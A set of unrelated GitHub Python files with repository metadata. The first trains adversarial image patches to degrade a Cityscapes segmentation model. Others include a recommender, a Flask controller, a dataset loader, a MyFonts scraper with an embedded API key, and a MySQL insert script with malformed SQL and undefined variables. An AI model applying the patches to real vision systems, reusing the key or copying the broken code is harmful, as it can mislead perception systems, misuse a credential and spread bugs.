'--warmup_steps',\n dest='warmup_steps',\n type=int,\n default=500,\n )\n # 运行模式\n parse.add_argument(\n '--mode',\n dest='mode',\n type=str,\n default='train',\n )\n parse.add_argument(\n '--ckpt',\n dest='ckpt',\n type=str,\n default=\"./checkpoints/STDC2-Seg/model_maxmIOU75.pth\",\n )\n # 模型路径\n parse.add_argument(\n '--respath',\n dest='respath',\n type=str,\n default=\"checkpoints/with_update_STDC2-Seg/\",\n )\n # 主干网络\n parse.add_argument(\n '--backbone',\n dest='backbone',\n type=str,\n default='STDCNet1446',\n )\n # 预训练模型\n parse.add_argument(\n '--pretrain_pathpretrain_path',\n dest='pretrain_path',\n type=str,\n default=None,\n )\n parse.add_argument(\n '--use_conv_last',\n dest='use_conv_last',\n type=str2bool,\n default=False,\n )\n parse.add_argument(\n '--use_boundary_2',\n dest='use_boundary_2',\n type=str2bool,\n default=False,\n )\n parse.add_argument(\n '--use_boundary_4',\n dest='use_boundary_4',\n type=str2bool,\n default=False,\n )\n parse.add_argument(\n '--use_boundary_8',\n dest='use_boundary_8',\n type=str2bool,\n default=True,\n )\n parse.add_argument(\n '--use_boundary_16',\n dest='use_boundary_16',\n type=str2bool,\n default=False,\n )\n return parse.parse_args()\n\n\nclass GenerateImage(nn.Module):\n def __init__(self):\n super(GenerateImage, self).__init__()\n # self.conv = nn.Conv2d(3, 3, 1, 1)\n # self.STDC = nn.Sequential(model)\n\n def forward(self, img, patch, mask):\n ih, iw = img.shape[2:]\n ib = img.shape[0]\n # print(img.device)\n img_batch = img.clone()\n # print(img_batch.device)\n # print(patch[0].shape)\n # exit(0)\n # 左,右,上,下\n pad_way = [[0, iw - patch_size, 0, ih - patch_size],\n [iw - patch_size, 0, 0, ih - patch_size],\n [0, iw - patch_size, ih - patch_size, 0],\n [iw - patch_size, 0, ih - patch_size, 0]]\n mask = mask.unsqueeze(dim=0).repeat([ib, 1, 1, 1])\n # make mask\n for index, way in enumerate(pad_way):\n mask_temp = F.pad(mask, (way[0], way[1], way[2], way[3]))\n patch_temp = patch[index].unsqueeze(dim=0).repeat([ib, 1, 1, 1])\n patch_temp = F.pad(patch_temp, (way[0], way[1], way[2], way[3]))\n mask_temp = mask_temp.type(torch.float32)\n img_batch = torch.where(mask_temp > 0.00001, patch_temp, img_batch)\n return img_batch\n\n\ndef generate_patch(load_from_file=None, is_random=False, is_cmyk=0):\n xpatch_size, ypatch_size = patch_size, patch_size\n # load a image from local patch\n if load_from_file is not None:\n patch = Image.open(load_from_file)\n patch = patch.resize((xpatch_size, ypatch_size))\n patch = transforms.PILToTensor()(patch) / 255.\n return patch\n if is_random:\n if is_cmyk:\n return torch.rand((4, xpatch_size, ypatch_size))\n else:\n return torch.rand((3, xpatch_size, ypatch_size))\n if is_cmyk:\n return torch.full((4, xpatch_size, ypatch_size), 0.5)\n else:\n return torch.full((3, xpatch_size, ypatch_size), 0.5)\n\n\ndef train():\n args = parse_args()\n # 设置模型保存路径\n save_pth_path = os.path.join(args.respath, 'pths')\n dspth = './data'\n\n print(save_pth_path)\n print(osp.exists(save_pth_path))\n # if not osp.exists(save_pth_path) and dist.get_rank()==0:\n if not osp.exists(save_pth_path):\n os.makedirs(save_pth_path)\n\n # torch.cuda.set_device(args.local_rank)\n # dist.init_process_group(\n # backend = 'nccl',\n # init_method = 'tcp://127.0.0.1:8081',\n # world_size = torch.cuda.device_count(),\n # rank=args.local_rank\n # )\n # print(\"你行不行\")\n # 设置日志文件\n setup_logger(args.respath)\n ## dataset\n n_classes = 19\n n_img_per_gpu = args.n_img_per_gpu\n n_workers_train = args.n_workers_train\n n_workers_val = args.n_workers_val\n use_boundary_16 = args.use_boundary_16\n use_boundary_8 = args.use_boundary_8\n use_boundary_4 = args.use_boundary_4\n use_boundary_2 = args.use_boundary_2\n\n mode = args.mode\n # 输出尺寸\n cropsize = [1024, 512]\n # 随机缩放\n randomscale = (0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875, 1.0, 1.125, 1.25, 1.375, 1.5)\n\n # if dist.get_rank()==0:\n # logger.info('n_workers_train: {}'.format(n_workers_train))\n # logger.info('n_workers_val: {}'.format(n_workers_val))\n # logger.info('use_boundary_2: {}'.format(use_boundary_2))\n # logger.info('use_boundary_4: {}'.format(use_boundary_4))\n # logger.info('use_boundary_8: {}'.format(use_boundary_8))\n # logger.info('use_boundary_16: {}'.format(use_boundary_16))\n # logger.info('mode: {}'.format(args.mode))\n # 加载数据集\n ds = CityScapes(dspth, cropsize=cropsize, mode=mode, randomscale=randomscale)\n # sampler = torch.utils.data.distributed.DistributedSampler(ds)\n dl = DataLoader(ds,\n batch_size=n_img_per_gpu,\n shuffle=False,\n num_workers=n_workers_train,\n\n pin_memory=False,\n drop_last=True)\n # exit(0)\n dsval = CityScapes(dspth, mode='val', randomscale=randomscale)\n # sampler_val = torch.utils.data.distributed.DistributedSampler(dsval)\n dlval = DataLoader(dsval,\n batch_size=2,\n shuffle=False,\n num_workers=n_workers_val,\n drop_last=False)\n\n ## model\n ignore_idx = 255\n # net = BiSeNet(backbone=args.backbone, n_classes=n_classes, pretrain_model=args.pretrain_path,\n # use_boundary_2=use_boundary_2, use_boundary_4=use_boundary_4, use_boundary_8=use_boundary_8,\n # use_boundary_16=use_boundary_16, use_conv_last=args.use_conv_last)\n net = torch.load(\"./checkpoints/edge_optim_STDC2-Seg/pths/model_maxmIOU75.pth\")\n net.cuda(CUDA_ID)\n # net.train()\n # net = nn.parallel.DistributedDataParallel(net,\n # device_ids=[args.local_rank, ],\n # output_device=args.local_rank,\n # find_unused_parameters=True\n # )\n\n score_thres = 0.7\n # 这个算的什么我也看不明白,batch*h*w//16\n n_min = n_img_per_gpu * cropsize[0] * cropsize[1] // 16\n criteria_p = OhemCELoss(thresh=score_thres, n_min=n_min, ignore_lb=ignore_idx)\n criteria_16 = OhemCELoss(thresh=score_thres, n_min=n_min, ignore_lb=ignore_idx)\n criteria_32 = OhemCELoss(thresh=score_thres, n_min=n_min, ignore_lb=ignore_idx)\n # 细节损失\n boundary_loss_func = DetailAggregateLoss()\n ## optimizer\n maxmIOU50 = 0.\n maxmIOU75 = 0.\n momentum = 0.9\n weight_decay = 5e-4\n lr_start = 1e-2\n max_iter = args.max_iter\n save_iter_sep = args.save_iter_sep\n power = 0.9\n warmup_steps = args.warmup_steps\n warmup_start_lr = 1e-5\n eval_times = 0\n\n # if dist.get_rank()==0:\n # print('max_iter: ', max_iter)\n # print('save_iter_sep: ', save_iter_sep)\n # print('warmup_steps: ', warmup_steps)\n # optim = Optimizer(\n # model=net,\n # loss=boundary_loss_func,\n # lr0=lr_start,\n # momentum=momentum,\n # wd=weight_decay,\n # warmup_steps=warmup_steps,\n # warmup_start_lr=warmup_start_lr,\n # max_iter=max_iter,\n # power=power)\n # 生成check图像,并且冻结整个网络的参数\n for params in net.parameters():\n params.requires_grad = False\n\n patches = []\n for i in range(4):\n adv_patch_cpu = generate_patch(is_random=True, is_cmyk=0)\n adv_patch = adv_patch_cpu.cuda(CUDA_ID)\n adv_patch.requires_grad_(True)\n patches.append(adv_patch)\n # adv_patch_cpu = generate_patch(is_random=True, is_cmyk=0)\n # # adv_patch_cpu.requires_grad_(True)\n # adv_patch = adv_patch_cpu.cuda(CUDA_ID)\n # adv_patch.requires_grad_(True)\n # adv_patch_cpu.requires_grad = True\n mask_patch = torch.ones_like(patches[0])\n trick = GenerateImage().cuda(CUDA_ID)\n\n # trick.train()\n optim = torch.optim.Adam(patches, lr=0.0001, betas=(0.9, 0.999),\n eps=1e-08,\n weight_decay=0)\n ## train loop\n msg_iter = 50\n loss_avg = []\n loss_boundery_bce = []\n loss_boundery_dice = []\n st = glob_st = time.time()\n diter = iter(dl)\n epoch = 0\n for it in range(max_iter):\n try:\n # 遍历数据集\n im, lb = next(diter)\n if not im.size()[0] == n_img_per_gpu: raise StopIteration\n except StopIteration:\n epoch += 1\n # sampler.set_epoch(epoch)\n diter = iter(dl)\n im, lb = next(diter)\n\n # print(im.shape)\n # exit(0)\n # 加入到cuda中\n\n mask_patch = mask_patch.cuda(CUDA_ID)\n im = im.cuda(CUDA_ID)\n\n # im = trick(im, adv_patch_cpu, mask_patch)\n lb = lb.cuda(CUDA_ID)\n H, W = im.size()[2:]\n lb = torch.squeeze(lb, 1)\n # test_data = net(im)\n # print(test_data)\n # print(type(test_data))\n # print(len(test_data))\n # exit(0)\n # out, out16, out32, detail8 = net(im, adv_patch_cpu, mask_patch)\n if use_boundary_2 and use_boundary_4 and use_boundary_8:\n out, out16, out32, detail2, detail4, detail8 = net(trick(im, patches, mask_patch))\n\n if (not use_boundary_2) and use_boundary_4 and use_boundary_8:\n out, out16, out32, detail4, detail8 = net(trick(im, patches, mask_patch))\n\n if (not use_boundary_2) and (not use_boundary_4) and use_boundary_8:\n out, out16, out32, detail8 = net(trick(im, patches, mask_patch))\n\n if (not use_boundary_2) and (not use_boundary_4) and (not use_boundary_8):\n out, out16, out32 = net(trick(im, patches, mask_patch))\n # 这个就是一个改了一下的交叉熵\n lossp = criteria_p(out, lb)\n loss2 = criteria_16(out16, lb)\n loss3 = criteria_32(out32, lb)\n optim.zero_grad()\n # print(adv_patch_cpu.grad)\n # exit(0)\n boundery_bce_loss = 0.\n boundery_dice_loss = 0.\n\n if use_boundary_2:\n # if dist.get_rank()==0:\n # print('use_boundary_2')\n boundery_bce_loss2, boundery_dice_loss2 = boundary_loss_func(detail2, lb)\n boundery_bce_loss += boundery_bce_loss2\n boundery_dice_loss += boundery_dice_loss2\n\n if use_boundary_4:\n # if dist.get_rank()==0:\n # print('use_boundary_4')\n boundery_bce_loss4, boundery_dice_loss4 = boundary_loss_func(detail4, lb)\n boundery_bce_loss += boundery_bce_loss4\n boundery_dice_loss += boundery_dice_loss4\n\n if use_boundary_8:\n # if dist.get_rank()==0:\n # print('use_boundary_8')\n # 这里计算了一个boundary的loss\n boundery_bce_loss8, boundery_dice_loss8 = boundary_loss_func(detail8, lb)\n boundery_bce_loss += boundery_bce_loss8\n boundery_dice_loss += boundery_dice_loss8\n\n loss = lossp + loss2 + loss3 + boundery_bce_loss + boundery_dice_loss\n\n loss.backward()\n optim.step()\n\n patches[0].data.clamp_(0, 1)\n patches[1].data.clamp_(0, 1)\n patches[2].data.clamp_(0, 1)\n patches[3].data.clamp_(0, 1)\n\n loss_avg.append(loss.item())\n\n loss_boundery_bce.append(boundery_bce_loss.item())\n loss_boundery_dice.append(boundery_dice_loss.item())\n # torch.cuda.empty_cache()\n\n ## print training log message\n if (it + 1) % msg_iter == 0:\n loss_avg = sum(loss_avg) / len(loss_avg)\n # lr = optim.lr\n lr = optim.defaults[\"lr\"]\n ed = time.time()\n t_intv, glob_t_intv = ed - st, ed - glob_st\n eta = int((max_iter - it) * (glob_t_intv / it))\n eta = str(datetime.timedelta(seconds=eta))\n\n loss_boundery_bce_avg = sum(loss_boundery_bce) / len(loss_boundery_bce)\n loss_boundery_dice_avg = sum(loss_boundery_dice) / len(loss_boundery_dice)\n msg = ', '.join([\n 'it: {it}/{max_it}',\n 'lr: {lr:4f}',\n 'loss: {loss:.4f}',\n 'boundery_bce_loss: {boundery_bce_loss:.4f}',\n 'boundery_dice_loss: {boundery_dice_loss:.4f}',\n 'eta: {eta}',\n 'time: {time:.4f}',\n ]).format(\n it=it + 1,\n max_it=max_iter,\n lr=lr,\n loss=loss_avg,\n boundery_bce_loss=loss_boundery_bce_avg,\n boundery_dice_loss=loss_boundery_dice_avg,\n time=t_intv,\n eta=eta\n )\n\n logger.info(msg)\n loss_avg = []\n loss_boundery_bce = []\n loss_boundery_dice = []\n st = ed\n\n # print(boundary_loss_func.get_params())\n if (it + 1) % save_iter_sep == 0: # and it != 0:\n\n ## model\n logger.info('evaluating the model ...')\n logger.info('setup and restore model')\n\n net.eval()\n # trick.eval()\n\n # ## evaluator\n eval_times += 1\n logger.info('compute the mIOU')\n with torch.no_grad():\n single_scale1 = MscEvalV0()\n mIOU50 = single_scale1(net, dlval, n_classes, trick, patches, mask_patch)\n\n single_scale2 = MscEvalV0(scale=0.75)\n mIOU75 = single_scale2(net, dlval, n_classes, trick, patches, mask_patch)\n\n # save_pth = osp.join(save_pth_path, 'model_iter{}_mIOU50_{}_mIOU75_{}.pth'\n # .format(it + 1, str(round(mIOU50, 4)), str(round(mIOU75, 4))))\n # # torch.save(net, save_pth)\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # # if dist.get_rank()==0:\n # torch.save(state, save_pth)\n\n # logger.info('training iteration {}, model saved to: {}'.format(it + 1, save_pth))\n logger.info('mIOU50 is: {}, mIOU75 is: {}'.format(mIOU50, mIOU75))\n\n save_patch_path = \"./images/patch/\"\n index = ['00', '01', '10', '11']\n for i, p in zip(index, patches):\n patch_name = os.path.join(save_patch_path + i + '/', f\"{mIOU75}_{mIOU50}.jpg\")\n torchvision.utils.save_image(p, patch_name)\n # summary.add_scalar(\"mIOU75\", mIOU75, eval_times)\n # summary.add_scalar(\"mIOU50\", mIOU50, eval_times)\n\n # exit(1)\n if mIOU50 > maxmIOU50:\n maxmIOU50 = mIOU50\n save_pth = osp.join(save_pth_path, 'model_maxmIOU50.pth'.format(it + 1))\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # # if dist.get_rank()==0:\n # torch.save(state, save_pth)\n # torch.save(net, save_pth)\n logger.info('max mIOU model saved to: {}'.format(save_pth))\n\n if mIOU75 > maxmIOU75:\n maxmIOU75 = mIOU75\n save_pth = osp.join(save_pth_path, 'model_maxmIOU75.pth'.format(it + 1))\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # if dist.get_rank()==0:\n # torch.save(state, save_pth)\n # torch.save(net, save_pth)\n logger.info('max mIOU model saved to: {}'.format(save_pth))\n logger.info('maxmIOU50 is: {}, maxmIOU75 is: {}.'.format(maxmIOU50, maxmIOU75))\n\n # net.train()\n net.eval()\n ## dump the final model\n save_pth = osp.join(save_pth_path, 'model_final.pth')\n net.cpu()\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # if dist.get_rank()==0:\n # torch.save(state, save_pth)\n # torch.save(net, save_pth)\n logger.info('training done, model saved to: {}'.format(save_pth))\n print('epoch: ', epoch)\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"zeroRains/STDC-MA","sub_path":"train_second.py","file_name":"train_second.py","file_ext":"py","file_size_in_byte":18637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33437879504","text":"import math\nimport numpy as np\nfrom scipy.spatial import distance\n\nclass UserBasedCF(object):\n def __init__(self, train_file):\n self.train_file = train_file\n self.readData()\n self.UserSimilarity_cosin()\n\n def readData(self):\n self.user_item = dict()\n with open(self.train_file, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n user, item, score, _ = line.strip().split(\"\\t\")\n self.user_item.setdefault(user, {})\n self.user_item[user][item] = int(score)\n\n\n def UserSimilarity_cosin(self):\n self.item_user = dict()\n for user, items in self.user_item.items():\n for i in items.keys():\n if i not in self.item_user:\n self.item_user[i] = set()\n self.item_user[i].add(user)\n\n C = dict() # 用户-用户共现矩阵\n for user in self.item_user.values():\n for u in user:\n C.setdefault(u, {})\n for v in user:\n if u == v:\n continue\n C[u].setdefault(v, 0)\n C[u][v] += 1\n # print(C[\"1\"][\"2\"])\n # print(\"------------------------------------\")\n\n self.W = dict()\n for u, related_users in C.items():\n self.W.setdefault(u, {})\n for v, cuv in related_users.items():\n self.W[u][v] = cuv / math.sqrt(len(self.user_item[u]) * len(self.user_item[v]))\n\n return self.W\n\n def Recommend(self, user, K=2, N=5):\n rank = dict()\n action_item = self.user_item[user].keys()\n\n for v, wuv in sorted(self.W[user].items(), key=lambda x: x[1], reverse=True)[0:K]:\n for i, rvi in self.user_item[v].items():\n if i in action_item:\n continue\n rank.setdefault(i, 0)\n rank[i] += wuv * rvi\n return list(sorted(rank.items(), key=lambda x: x[1], reverse=True)[0:N])\n\n\nif __name__ == \"__main__\":\n ucf = UserBasedCF(\"./ml-100k/u1.base\")\n print(ucf.Recommend(\"2\"))","repo_name":"tantao258/recommend","sub_path":"algorithm/UCF.py","file_name":"UCF.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41838913595","text":"import requests\nimport json\nimport mysql.connector\n\n#api authentication\n#The code first defines two variables: API_KEY and API_ENDPOINT. \n#These variables store the API key and the endpoint URL for the API you want to access.\nAPI_KEY = 'your_api_key_here'\nAPI_ENDPOINT = 'https://api.example.com/data'\n\n# The next line creates a dictionary called headers. \n# This dictionary contains a single key-value pair: Authorization and Bearer {API_KEY}. \n# This header tells the API that you are authorized to access it.\nheaders = {\n 'Authorization': f'Bearer {API_KEY}'\n}\n\n#The next line uses the requests library to make a GET request to the API endpoint. \n#The headers dictionary is passed as an argument to the requests.get() function.\n#The requests.get() function returns a response object. \n#This object contains information about the response, such as the status code and the response body.\ntry:\n response = requests.get(API_ENDPOINT, headers=headers)\n#The next line checks the response.status_code. If the status code is 200, then the request was successful. \n# In this case, the response.json() method is used to decode the response body as JSON. \n# The decoded JSON data is then printed to the console.\n if response.status_code == 200:\n data = response.json()\n print(\"API response:\", data)\n#If the status code is not 200, then the request failed. \n#In this case, the print() function is used to print the status code to the console. \n else:\n print(\"API request failed. Status code:\", response.status_code)\n# The final two lines of code handle errors that might occur when making the API request. \n# The except clause catches any requests.exceptions.RequestException errors. \n# These errors are raised when there is a problem making the request, such as a network error or a malformed request. \n# If an error occurs, the print() function is used to print the error message to the console.\nexcept requests.exceptions.RequestException as e:\n print(\"Error making API request:\", e)\n\n# Replace these values with your MySQL database credentials\ndb_config = {\n 'host': 'your_host',\n 'user': 'your_username',\n 'password': 'your_password',\n 'database': 'your_database_name'\n}\n\n\ndef create_connection():\n try:\n conn = mysql.connector.connect(**db_config)\n return conn\n except mysql.connector.Error as err:\n print(f\"Error connecting to MySQL: {err}\")\n return None\n\n\ndef read_json_data_from_file(file_path):\n try:\n with open(file_path, 'r') as file:\n data = json.load(file)\n return data\n except FileNotFoundError:\n print(f\"File '{file_path}' not found.\")\n return None\n except json.JSONDecodeError as err:\n print(f\"Error decoding JSON in file '{file_path}': {err}\")\n return None\n\n\ndef check_and_insert_data(data):\n try:\n connection = create_connection()\n if not connection:\n return\n\n cursor = connection.cursor()\n\n name = data['name']\n id = data['id']\n lob = data['lob']\n service = data['service']\n # Check if any of the 4 values exist in the database\n cursor.execute(\"SELECT id FROM employees WHERE name = %s AND id = %s AND lob = %s AND service = AND\",\n (name, employee_id, lob, service))\n print(\"CUSTOMER ALREADY EXIST\")\n\n # Check if any of the 4 values exist in the database\n cursor.execute(\"SELECT id FROM employees WHERE name = %s OR id = %s OR lob = %s OR service = %s\",\n (name, employee_id, lob, service))\n print(f\"Inserted data for {name}\")\n\n\n if not result:\n # If none of the values are present, insert the record into the database\n cursor.execute(\"INSERT INTO employees (name, id, lob, service) VALUES (%s, %s, %s, %s)\",\n (name, employee_id, lob, service))\n print(f\"Inserted data for {name}\")\n\n # Commit changes to the database\n connection.commit()\n\n except mysql.connector.Error as err:\n print(f\"Error accessing MySQL: {err}\")\n finally:\n if connection:\n connection.close()\n print(\"Database connection closed.\")\n\nif __name__ == \"__main__\":\n json_file_path = \"data.json\" # Replace this with the path to your JSON file\n json_data = read_json_data_from_file(json_file_path)\n if json_data:\n # Now you can use the 'json_data' variable containing the JSON data read from the file\n check_and_insert_data(json_data)","repo_name":"kathirnatchiyar/Fast_API","sub_path":"comments/comments_added_bala.py","file_name":"comments_added_bala.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25995437676","text":"print(\"running controller file\")\nfrom flask_app import app\nfrom flask import render_template, redirect, request\nfrom flask_app.models.user import User\n\n@app.route('/read')\ndef read():\n return render_template('read.html')\n\n@app.route('/') #read.html\ndef index():\n names = User.get_all()\n return render_template('read.html', names=names)\n\n@app.route('/add_new') #create.html\ndef add ():\n return render_template('/create.html')\n \n@app.route('/process', methods=['POST']) #read_one.html\ndef process():\n data = {\n \"fname\": request.form[\"fname\"],\n \"lname\": request.form[\"lname\"],\n \"email\": request.form[\"email\"]\n } \n id = User.save(data)\n return redirect(f'/show/{id}')\n\n@app.route('/show/<int:id>') #read_one\ndef show(id):\n data = {\n \"id\": id\n }\n print(id)\n return render_template('read_one.html', user=User.show(data))\n\n@app.route('/create_user', methods=['POST'])\ndef create():\n return redirect('/')\n\n@app.route('/delete/<int:id>')\ndef delete(id):\n data = {\n \"id\": id\n }\n User.delete(data)\n return redirect('/')\n \n@app.route('/edit') #edit.html\ndef edit():\n return render_template('edit.html')\n\n\n\n","repo_name":"Brian-304/Users_CRUD_Modularization_Python","sub_path":"flask_app/controllers/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23580915286","text":"import anytree\nimport numpy as np\nimport os\nimport torch\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nfrom utils import check_exists, makedir_exist_ok, save, load\nfrom .utils import download_url, extract_file, make_classes_counts, make_tree, make_flat_index\n\n\nclass STL10(Dataset):\n data_name = 'STL10'\n file = [('http://ai.stanford.edu/~acoates/stl10/stl10_binary.tar.gz', '91f7769df0f17e558f3565bffb0c7dfb')]\n\n def __init__(self, root, split, transform=None):\n self.root = os.path.expanduser(root)\n self.split = split\n self.transform = transform\n if not check_exists(self.processed_folder):\n self.process()\n id, self.data, self.target = load(os.path.join(self.processed_folder, '{}.pt'.format(self.split)),\n mode='pickle')\n self.classes_counts = make_classes_counts(self.target)\n self.classes_to_labels, self.target_size = load(os.path.join(self.processed_folder, 'meta.pt'), mode='pickle')\n self.other = {'id': id}\n\n def __getitem__(self, index):\n data, target = Image.fromarray(self.data[index]), torch.tensor(self.target[index])\n other = {k: torch.tensor(self.other[k][index]) for k in self.other}\n input = {**other, 'data': data, 'target': target}\n if self.transform is not None:\n input = self.transform(input)\n return input\n\n def __len__(self):\n return len(self.data)\n\n @property\n def processed_folder(self):\n return os.path.join(self.root, 'processed')\n\n @property\n def raw_folder(self):\n return os.path.join(self.root, 'raw')\n\n def process(self):\n if not check_exists(self.raw_folder):\n self.download()\n train_set, test_set, meta = self.make_data()\n save(train_set, os.path.join(self.processed_folder, 'train.pt'), mode='pickle')\n save(test_set, os.path.join(self.processed_folder, 'test.pt'), mode='pickle')\n save(meta, os.path.join(self.processed_folder, 'meta.pt'), mode='pickle')\n return\n\n def download(self):\n makedir_exist_ok(self.raw_folder)\n for (url, md5) in self.file:\n filename = os.path.basename(url)\n download_url(url, self.raw_folder, filename, md5)\n extract_file(os.path.join(self.raw_folder, filename))\n return\n\n def __repr__(self):\n fmt_str = 'Dataset {}\\nSize: {}\\nRoot: {}\\nSplit: {}\\nTransforms: {}'.format(\n self.__class__.__name__, self.__len__(), self.root, self.split, self.transform.__repr__())\n return fmt_str\n\n def make_data(self):\n train_labeled_data, train_labeled_target = read_data_file(\n os.path.join(self.raw_folder, 'stl10_binary', 'train_X.bin'),\n os.path.join(self.raw_folder, 'stl10_binary', 'train_y.bin'))\n train_unlabeled_data, train_unlabeled_target = read_data_file(\n os.path.join(self.raw_folder, 'stl10_binary', 'unlabeled_X.bin'))\n train_data = np.concatenate((train_labeled_data, train_unlabeled_data))\n train_target = np.concatenate((train_labeled_target, train_unlabeled_target))\n test_data, test_target = read_data_file(\n os.path.join(self.raw_folder, 'stl10_binary', 'test_X.bin'),\n os.path.join(self.raw_folder, 'stl10_binary', 'test_y.bin'))\n train_id, test_id = np.arange(len(train_data)).astype(np.int64), np.arange(len(test_data)).astype(np.int64)\n classes_to_labels = anytree.Node('U', index=[])\n classes = list(map(str, list(range(10))))\n for c in classes:\n make_tree(classes_to_labels, [c])\n classes_size = make_flat_index(classes_to_labels)\n return (train_id, train_data, train_target), (test_id, test_data, test_target), (\n classes_to_labels, classes_size)\n\n\ndef read_data_file(data_path, label_path=None):\n with open(data_path, 'rb') as f:\n # read whole file in uint8 chunks\n everything = np.fromfile(f, dtype=np.uint8)\n images = np.reshape(everything, (-1, 3, 96, 96))\n images = np.transpose(images, (0, 3, 2, 1))\n if label_path is not None:\n with open(label_path, 'rb') as f:\n labels = (np.fromfile(f, dtype=np.uint8) - 1).astype(np.int64) # 0-based\n else:\n labels = - np.ones(images.shape[0], dtype=np.int64)\n return images, labels\n","repo_name":"diaoenmao/SemiFL-Semi-Supervised-Federated-Learning-for-Unlabeled-Clients-with-Alternate-Training","sub_path":"src/datasets/stl.py","file_name":"stl.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"} +{"seq_id":"8211925775","text":"import argparse\nfrom unicodedata import category\nimport requests\nimport cv2\nimport numpy as np\nimport os\nimport csv\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-c\", type=str, required=True, help=\"(Required) Add a string with category, use flag_ -c\")\nparser.add_argument(\"-o\", type=str, required=True, help=\"(Required) Add a string with the path to a csv file, use flag: -0\")\nargs = parser.parse_args()\nCATEGORY = args.c\nOUTPUTFILE = args.o\n\ndef writeToCSV(category, typeface, styleName, styleId):\n f = open(OUTPUTFILE, 'a', encoding='UTF8')\n writer = csv.writer(f, delimiter=';')\n row = [category, typeface, styleName, styleId]\n writer.writerow(row)\n f.close()\n\ndef fetchStyles():\n try:\n apiResponse = requests.get(f'https://api.myfonts.net/v1/family?api_key=EE5HsjFDom5yIcGTdBu2KhMBO&&category={CATEGORY}&extra_data=styles')\n if apiResponse.json()[\"total_results\"] == 0:\n print(f'There was an error while fetching {CATEGORY}. Check your -c string')\n else:\n familyResponseJson = apiResponse.json()[\"results\"] \n familyKeys = list(familyResponseJson.keys()) \n for s in range(len(familyKeys)):\n if \"styles\" in familyResponseJson[familyKeys[s]]:\n styleResponseJson =familyResponseJson[familyKeys[s]]['styles'] \n for j in range(len(styleResponseJson)):\n styleName = styleResponseJson[j][\"name\"]\n styleId = styleResponseJson[j][\"id\"]\n familyName = familyResponseJson[familyKeys[s]][\"name\"].replace(\"™\", u\"\\u2122\").replace(\"®\",u\"\\xae\")\n writeToCSV(CATEGORY.replace(\"-\",\" \"), familyName,styleName, styleId)\n except requests.exceptions.HTTPError as err:\n raise SystemExit(err) \nfetchStyles()\n","repo_name":"johanHardon/quantitative-typography-analysis","sub_path":"font-database-large-corpus/categoryApi.py","file_name":"categoryApi.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28245617213","text":"from __future__ import annotations\n\nfrom contextlib import asynccontextmanager, closing\nfrom typing import AsyncIterator, TYPE_CHECKING\n\nfrom trio import open_memory_channel, open_nursery, to_thread\nfrom trio.abc import SendChannel\nfrom trio.socket import (\n socket,\n AF_INET,\n IPPROTO_UDP,\n SOCK_DGRAM,\n)\n\nif TYPE_CHECKING:\n from serial import Serial\n\n__all__ = (\"UDPSerialBridge\",)\n\n\nclass UDPSerialBridge:\n \"\"\"Background task that creates a transparent bridge between a UDP port\n and a serial port.\n\n Packets received on the UDP port are serialized and forwarded to the serial\n port. Packets written to the serial port are forwarded to all UDP\n hostname-port pairs that have ever sent a packet to the UDP port.\n \"\"\"\n\n _address: str\n _port: Serial\n _targets: set[tuple[str, int]]\n\n def __init__(self, address: str, port: Serial):\n \"\"\"Constructor.\n\n Args:\n address: IP address and port to listen to\n port: serial port to forward the packets to\n \"\"\"\n self._address = address\n self._port = port\n self._targets = set()\n\n @asynccontextmanager\n async def use(self) -> AsyncIterator[None]:\n host, _, port = self._address.partition(\":\")\n\n listener = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)\n await listener.bind((host, port))\n\n async with open_nursery() as nursery:\n socket_tx = await nursery.start(self._write_to_socket, listener)\n port_tx = await nursery.start(self._write_to_serial_port)\n\n await nursery.start(self._read_from_socket, listener, port_tx)\n await nursery.start(self._read_from_serial_port, socket_tx)\n\n yield\n\n async def _read_from_serial_port(\n self, tx: SendChannel[bytes], *, task_status\n ) -> None:\n parts: list[bytes] = []\n bytes_read: int = 0\n\n MAX_BYTES: int = 4096\n\n async with tx:\n task_status.started()\n while True:\n data = await to_thread.run_sync(self._port.read, 1, cancellable=True)\n parts.append(data)\n bytes_read += len(data)\n\n while self._port.in_waiting > 0:\n to_read = min(self._port.in_waiting, MAX_BYTES - bytes_read)\n if to_read <= 0:\n break\n\n data = await to_thread.run_sync(\n self._port.read, to_read, cancellable=True\n )\n parts.append(data)\n bytes_read += len(data)\n\n await tx.send(b\"\".join(parts))\n\n parts.clear()\n bytes_read = 0\n\n async def _read_from_socket(\n self, listener, tx: SendChannel[bytes], *, task_status\n ) -> None:\n with closing(listener):\n async with tx:\n task_status.started()\n while True:\n data, address = await listener.recvfrom(4096)\n self._targets.add(address)\n await tx.send(data)\n\n async def _write_to_serial_port(self, *, task_status) -> None:\n tx, rx = open_memory_channel(32)\n\n async with rx:\n task_status.started(tx)\n async for data in rx:\n await to_thread.run_sync(self._port.write, data, cancellable=True)\n\n async def _write_to_socket(self, socket, *, task_status) -> None:\n tx, rx = open_memory_channel(32)\n\n async with rx:\n task_status.started(tx)\n async for data in rx:\n # TODO(ntamas): maybe we should write to a multicast address\n # instead?\n for address in self._targets:\n await socket.sendto(data, 